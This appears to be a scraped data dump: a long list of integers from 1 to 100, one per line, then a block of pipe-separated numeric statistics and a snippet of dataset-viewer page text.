52
46
46
99
71
99
17
59
97
2
18
1
94
53
29
13
84
14
51
29
8
27
1
47
27
47
100
21
41
35
68
47
13
24
49
83
65
74
89
28
3
36
66
54
39
48
44
14
57
50
1
34
49
84
59
71
31
26
83
62
91
20
30
67
74
97
38
49
40
25
59
22
91
19
51
51
3
19
56
6
84
64
86
63
95
26
35
9
18
49
35
47
88
63
80
16
44
38
63
17
52
65
47
37
34
22
66
88
93
98
2
82
76
100
93
22
90
23
27
25
51
36
1
73
68
70
3
39
70
69
26
41
49
29
70
98
12
88
83
32
43
8
31
100
90
32
87
81
45
52
89
82
59
50
18
56
71
100
48
25
38
50
46
49
68
9
3
46
94
97
12
65
19
91
80
81
31
34
73
15
80
20
10
69
95
71
66
58
15
16
55
26
30
68
38
11
63
62
61
84
83
4
5
31
76
7
81
48
96
86
56
22
57
72
13
74
75
82
95
22
70
47
64
4
51
8
46
93
43
100
32
44
34
19
44
78
97
58
18
40
34
61
51
53
89
53
79
19
87
26
5
45
82
95
69
76
80
57
96
42
66
27
35
81
91
41
73
14
82
1
44
90
69
76
39
50
87
29
6
38
82
89
82
67
60
20
61
91
77
89
48
92
66
5
33
56
58
58
54
25
73
94
47
51
37
30
89
9
43
64
2
30
51
71
18
7
39
100
58
89
65
33
28
52
54
72
50
50
17
80
21
79
92
24
12
60
13
13
46
81
27
79
93
27
27
17
66
54
85
16
62
84
30
17
33
3
93
65
29
12
31
62
14
100
69
9
57
41
15
71
98
15
60
66
24
50
80
98
24
80
92
92
11
35
14
10
79
5
1
87
74
3
73
52
79
28
73
32
35
96
69
98
33
38
66
52
95
64
81
24
1
5
11
45
53
55
6
81
17
16
56
35
58
80
58
54
18
50
14
23
57
74
90
86
65
43
29
25
74
92
93
51
66
47
28
50
83
23
50
43
2
67
10
72
92
70
56
55
90
52
34
98
53
70
73
71
73
3
98
97
60
58
91
98
77
30
68
37
36
87
76
67
72
35
72
14
36
26
26
7
2
76
48
84
2
46
83
89
2
12
5
5
43
29
30
57
93
80
75
6
75
14
5
59
20
60
38
65
47
10
18
13
49
23
42
9
42
26
100
84
53
10
64
71
13
41
77
39
58
81
85
29
7
26
35
51
97
76
67
55
34
8
97
32
67
23
76
71
90
3
50
64
21
73
43
82
11
91
61
89
100
94
8
72
48
39
44
41
66
75
63
73
83
81
100
28
16
10
38
18
43
61
47
66
64
87
1
69
83
33
96
25
52
58
65
68
57
16
34
35
55
87
23
28
33
4
19
8
56
94
19
60
47
41
93
| 2.920708
| 3
| 0.657651
| 10,000
| 29,210
| 1.921
| 0.01
| 0.001093
| 0.001093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.342349
| 29,210
| 10,000
| 4
| 2.921
| 0
| 0
| 0
| 0.9122
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.